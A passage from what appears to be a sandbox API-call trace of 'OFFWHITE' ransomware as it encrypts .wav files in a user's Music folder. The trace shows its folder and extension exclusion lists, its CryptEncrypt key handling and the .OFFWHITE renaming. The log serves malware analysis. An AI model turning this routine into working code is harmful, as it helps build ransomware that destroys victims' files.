ftLastAccessTime.dwHighDateTime=0x1d5d7be, ftLastWriteTime.dwLowDateTime=0x42ceb9e0, ftLastWriteTime.dwHighDateTime=0x1d5d7be, nFileSizeHigh=0x0, nFileSizeLow=0x324e, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="9tQF7vTGgr6.wav", cAlternateFileName="9TQF7V~1.WAV")) returned 1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2=".") returned 1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="..") returned 1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="...") returned 1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="windows") returned -1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="$recycle.bin") returned 1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="rsa") returned -1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="ntuser.dat") returned -1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="programdata") returned -1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="appdata") returned -1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="program files") returned -1 [0135.117] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="program files (x86)") returned -1 [0135.117] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" [0135.117] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\", lpString2="9tQF7vTGgr6.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav" [0135.117] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.117] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.117] PathFindExtensionW (pszPath="9tQF7vTGgr6.wav") returned=".wav" [0135.117] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0135.117] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0135.117] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0135.117] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0135.117] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0135.117] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0135.117] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0135.118] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0135.118] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0135.118] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0135.118] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0135.118] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0135.118] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0135.118] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0135.118] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0135.118] lstrcmpiW (lpString1="9tQF7vTGgr6.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.118] GetProcessHeap () returned 0x500000 [0135.118] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5318f0 [0135.118] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\9tqf7vtggr6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.118] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=12878) returned 1 [0135.118] GetProcessHeap () returned 0x500000 [0135.118] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.118] GetProcessHeap () returned 0x500000 [0135.118] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.118] GetProcessHeap () returned 0x500000 [0135.118] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.119] GetProcessHeap () returned 0x500000 [0135.119] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.119] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.119] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.119] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.119] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.119] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.119] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.119] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.119] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.119] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.120] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.120] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.120] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.121] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x324e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.121] SetLastError (dwErrCode=0x0) [0135.121] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.123] GetLastError () returned 0x0 [0135.123] GetLastError () returned 0x0 [0135.123] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x334e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.123] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.123] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x344e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.125] WriteFile (in: hFile=0x21c, lpBuffer=0x5318f0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5318f0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.125] GetProcessHeap () returned 0x500000 [0135.125] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x324e) returned 0x55a7b8 [0135.125] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.125] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x324e, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x324e, lpOverlapped=0x0) returned 1 [0135.126] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.127] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x324e, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x324e, lpOverlapped=0x0) returned 1 [0135.127] GetProcessHeap () returned 0x500000 [0135.127] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.127] CloseHandle (hObject=0x21c) returned 1 [0135.133] GetProcessHeap () returned 0x500000 [0135.133] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.133] GetProcessHeap () returned 0x500000 [0135.133] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.133] GetProcessHeap () returned 0x500000 [0135.133] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.133] GetProcessHeap () returned 0x500000 [0135.133] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.133] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav" [0135.133] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav.OFFWHITE" [0135.133] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\9tqf7vtggr6.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\9tQF7vTGgr6.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\9tqf7vtggr6.wav.offwhite")) returned 1 [0135.134] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4049170, ftCreationTime.dwHighDateTime=0x1d5deb3, ftLastAccessTime.dwLowDateTime=0xe53e670, ftLastAccessTime.dwHighDateTime=0x1d5da86, ftLastWriteTime.dwLowDateTime=0xe53e670, ftLastWriteTime.dwHighDateTime=0x1d5da86, nFileSizeHigh=0x0, nFileSizeLow=0x12e59, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="Er103hX QTFj5eUqG.wav", cAlternateFileName="ER103H~1.WAV")) returned 1 [0135.134] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2=".") returned 1 [0135.134] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="..") returned 1 [0135.134] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="...") returned 1 [0135.134] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="windows") returned -1 [0135.134] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="$recycle.bin") returned 1 [0135.134] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="rsa") returned -1 [0135.134] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="ntuser.dat") returned -1 [0135.134] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="programdata") returned -1 [0135.134] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="appdata") returned 1 [0135.134] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="program files") returned -1 [0135.135] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="program files (x86)") returned -1 [0135.135] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" [0135.135] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\", lpString2="Er103hX QTFj5eUqG.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav" [0135.135] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.135] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.135] PathFindExtensionW (pszPath="Er103hX QTFj5eUqG.wav") returned=".wav" [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0135.135] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0135.136] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0135.136] lstrcmpiW (lpString1="Er103hX QTFj5eUqG.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.136] GetProcessHeap () returned 0x500000 [0135.136] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531900 [0135.136] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\er103hx qtfj5euqg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.136] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=77401) returned 1 [0135.136] GetProcessHeap () returned 0x500000 [0135.136] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0135.136] GetProcessHeap () returned 0x500000 [0135.136] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0135.136] GetProcessHeap () returned 0x500000 [0135.136] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0135.136] GetProcessHeap () returned 0x500000 [0135.136] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0135.136] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.136] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.137] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0135.137] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.137] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.137] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0135.137] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.137] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.137] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.137] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.137] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.137] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.137] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12e59, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.137] SetLastError (dwErrCode=0x0) [0135.137] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.155] GetLastError () returned 0x0 [0135.155] GetLastError () returned 0x0 [0135.155] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12f59, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.155] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.155] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x13059, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.155] WriteFile (in: hFile=0x21c, lpBuffer=0x531900*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x531900*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.156] GetProcessHeap () returned 0x500000 [0135.156] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x12e59) returned 0x55a7b8 [0135.156] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.156] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x12e59, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x12e59, lpOverlapped=0x0) returned 1 [0135.161] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.161] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x12e59, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x12e59, lpOverlapped=0x0) returned 1 [0135.162] GetProcessHeap () returned 0x500000 [0135.162] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.162] CloseHandle (hObject=0x21c) returned 1 [0135.164] GetProcessHeap () returned 0x500000 [0135.164] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0135.164] GetProcessHeap () returned 0x500000 [0135.164] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0135.164] GetProcessHeap () returned 0x500000 [0135.164] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0135.164] GetProcessHeap () returned 0x500000 [0135.164] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0135.164] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav" [0135.164] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav.OFFWHITE" [0135.164] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\er103hx qtfj5euqg.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\Er103hX QTFj5eUqG.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i4kpj\\er103hx qtfj5euqg.wav.offwhite")) returned 1 [0135.165] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24869e90, ftCreationTime.dwHighDateTime=0x1d5ddbc, ftLastAccessTime.dwLowDateTime=0x6c228d50, ftLastAccessTime.dwHighDateTime=0x1d5e4cd, ftLastWriteTime.dwLowDateTime=0x6c228d50, ftLastWriteTime.dwHighDateTime=0x1d5e4cd, nFileSizeHigh=0x0, nFileSizeLow=0x808c, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="fTqzBY MHmXK2RZXyo.mp3", cAlternateFileName="FTQZBY~1.MP3")) returned 1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2=".") returned 1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2="..") returned 1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2="...") returned 1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2="windows") returned -1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2="$recycle.bin") returned 1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2="rsa") returned -1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2="ntuser.dat") returned -1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2="programdata") returned -1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2="appdata") returned 1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2="program files") returned -1 [0135.165] lstrcmpiW (lpString1="fTqzBY MHmXK2RZXyo.mp3", lpString2="program files (x86)") returned -1 [0135.166] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" [0135.166] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\", lpString2="fTqzBY MHmXK2RZXyo.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\fTqzBY MHmXK2RZXyo.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\fTqzBY MHmXK2RZXyo.mp3" [0135.166] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.166] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.166] PathFindExtensionW (pszPath="fTqzBY MHmXK2RZXyo.mp3") returned=".mp3" [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0135.166] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0135.166] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783eaa0, ftCreationTime.dwHighDateTime=0x1d5e4e9, ftLastAccessTime.dwLowDateTime=0xd805fa30, ftLastAccessTime.dwHighDateTime=0x1d5dc5c, ftLastWriteTime.dwLowDateTime=0xd805fa30, ftLastWriteTime.dwHighDateTime=0x1d5dc5c, nFileSizeHigh=0x0, nFileSizeLow=0x9800, dwReserved0=0x295debc, dwReserved1=0x58f3ad3f, cFileName="Z54uS6dIPlPf.mp3", cAlternateFileName="Z54US6~1.MP3")) returned 1 [0135.166] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2=".") returned 1 [0135.166] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2="..") returned 1 [0135.166] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2="...") returned 1 [0135.166] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2="windows") returned 1 [0135.166] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2="$recycle.bin") returned 1 [0135.166] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2="rsa") returned 1 [0135.166] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2="ntuser.dat") returned 1 [0135.166] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2="programdata") returned 1 [0135.167] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2="appdata") returned 1 [0135.167] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2="program files") returned 1 [0135.167] lstrcmpiW (lpString1="Z54uS6dIPlPf.mp3", lpString2="program files (x86)") returned 1 [0135.167] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\" [0135.167] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\I4kPj\\", lpString2="Z54uS6dIPlPf.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS 